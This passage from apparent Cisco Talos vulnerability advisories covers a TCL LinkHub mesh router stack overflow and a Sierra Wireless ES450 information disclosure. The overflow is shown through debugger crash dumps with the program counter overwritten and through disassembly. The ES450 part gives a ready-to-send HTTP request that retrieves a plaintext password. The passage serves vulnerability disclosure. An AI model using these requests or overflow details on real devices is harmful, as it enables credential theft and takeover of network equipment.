0x41414141 (\"AAAA\"?)\n $t3 : 0x41414141 (\"AAAA\"?)\n $t4 : 0x41414141 (\"AAAA\"?)\n $t5 : 0x41414141 (\"AAAA\"?)\n $t6 : 0x41414141 (\"AAAA\"?)\n $t7 : 0x41414141 (\"AAAA\"?)\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x7fe05d48 \u2192 0x82011507\n $s2 : 0x772f6a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x772f7be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x772dd090 \u2192 0x3c1c0003\n $s6 : 0x1b6\n $s7 : 0x10\n $t8 : 0x1\n $t9 : 0x76ee752c \u2192 0x3c1c0002\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7fe05af8 \u2192 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9\n $hi : 0x5\n $lo : 0x19999999\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u
2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7fe05af8\u2502+0x0000: 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9 \u2190 $sp\n 0x7fe05afc\u2502+0x0004: 0x000001ae\n 0x7fe05b00\u2502+0x0008: 0x7fe05d6c \u2192 0xa9120108\n 0x7fe05b04\u2502+0x000c: 0x00000000\n 0x7fe05b08\u2502+0x0010: 0x004ae4b0 \u2192 0x00000000\n 0x7fe05b0c\u2502+0x0014: 0x00000000\n 0x7fe05b10\u2502+0x0018: 0x004bbfe8 \u2192 0x772d1c28 \u2192 0x28aaeef9\n 0x7fe05b14\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] 
Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? 
(), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n#### CVE-2022-23919 - name stack buffer overflow\n\nAs seen above at [5] the `name` `memcpy` occurs into a stack-based buffer of size 0x40.\n \n \n 00413d34 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413d38 1000508c lw $s0, 0x10($v0) {MfRule::name}\n 00413d3c 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413d40 1000428c lw $v0, 0x10($v0) {MfRule::name}\n 00413d44 21204000 move $a0, $v0\n 00413d48 c08a828f lw $v0, -0x7540($gp) {strlen} [10]\n 00413d4c 21c84000 move $t9, $v0\n 00413d50 09f82003 jalr $t9\n 00413d54 00000000 nop \n 00413d58 1800dc8f lw $gp, 0x18($fp) {var_1c0}\n 00413d5c 4800c327 addiu $v1, $fp, 0x48 {nameBuffer}\n 00413d60 
21206000 move $a0, $v1 {nameBuffer}\n 00413d64 21280002 move $a1, $s0\n 00413d68 21304000 move $a2, $v0\n 00413d6c b88b828f lw $v0, -0x7448($gp) {memcpy}\n 00413d70 21c84000 move $t9, $v0\n 00413d74 09f82003 jalr $t9\n 00413d78 00000000 nop \n \n\nAt [8] and [10] we can see that the length of the `memcpy` is not the static size of the buffer, but instead the `strlen` of the user data provided from the protobuf packet. This results in a simple stack buffer overflow.\n\n#### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? ()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x0\n $v1 : 0x2\n 
$a0 : 0x11\n $a1 : 0x2\n $a2 : 0x200\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x41414141 (\"AAAA\"?)\n $t2 : 0x004bc828 \u2192 0x0045d3e0 \u2192 <add_results_timeout_check+0> lui gp, 0x5\n $t3 : 0x5\n $t4 : 0xfffffffc\n $t5 : 0xfffffffe\n $t6 : 0x770bd534 \u2192 0x00000000\n $t7 : 0x0\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x7f9a90b8 \u2192 0x82011507\n $s2 : 0x774a6a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x774a7be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x7748d090 \u2192 0x3c1c0003\n $s6 : 0x1b3\n $s7 : 0x10\n $t8 : 0x264\n $t9 : 0x7709752c \u2192 0x3c1c0002\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7f9a8e68 \u2192 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9\n $hi : 0x31a\n $lo : 0x1cbe9\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25
00\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7f9a8e68\u2502+0x0000: 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9 \u2190 $sp\n 0x7f9a8e6c\u2502+0x0004: 0x000001ab\n 0x7f9a8e70\u2502+0x0008: 0x7f9a90dc \u2192 0xa6120108\n 0x7f9a8e74\u2502+0x000c: 0x00000000\n 0x7f9a8e78\u2502+0x0010: 0x004ae4b0 \u2192 0x00000000\n 0x7f9a8e7c\u2502+0x0014: 0x00000000\n 0x7f9a8e80\u2502+0x0018: 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9\n 0x7f9a8e84\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] 
Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? 
(), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n##### TIMELINE\n\n2022-02-08 - Initial Vendor Contact \n2022-02-09 - Vendor Disclosure \n2022-08-01 - Public Release\n\n##### Credit\n\nDiscovered by Carl Hurd of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1456\n\nPrevious Report\n\nTALOS-2022-1454\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-01T00:00:00", "type": "talos", "title": "TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23918", "CVE-2022-23919"], "modified": "2022-08-01T00:00:00", "id": "TALOS-2022-1455", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T16:54:28", "description": "### Summary\n\nAn exploitable Information Disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but not limited to, plaintext passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.\n\n### Tested Versions\n\nSierra Wireless AirLink ES450 FW 4.9.3\n\n### Product URLs\n\n<https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/>\n\n### CVSSv3 Score\n\n7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### CWE\n\nCWE-200: Information Exposure\n\n### Details\n\nSierra Wireless is a wireless communications equipement designer and manufacturer. 
They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.\n\nACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.\n\nThese vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.\n\n#### CVE-2018-4070\n\nThe Embedded_Ace_Get_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_Get_Task.cgi` endpoint. 
The following request shows the MSCIID for retrieving the `user` password for the device in plaintext.\n \n \n POST /cgi-bin/Embedded_Ace_Get_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 4\n Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e\n Connection: close\n \n 5003\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.\n\n#### CVE-2018-4071\n\nThe Embedded_Ace_TLGet_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_TLGet_Task.cgi` endpoint. 
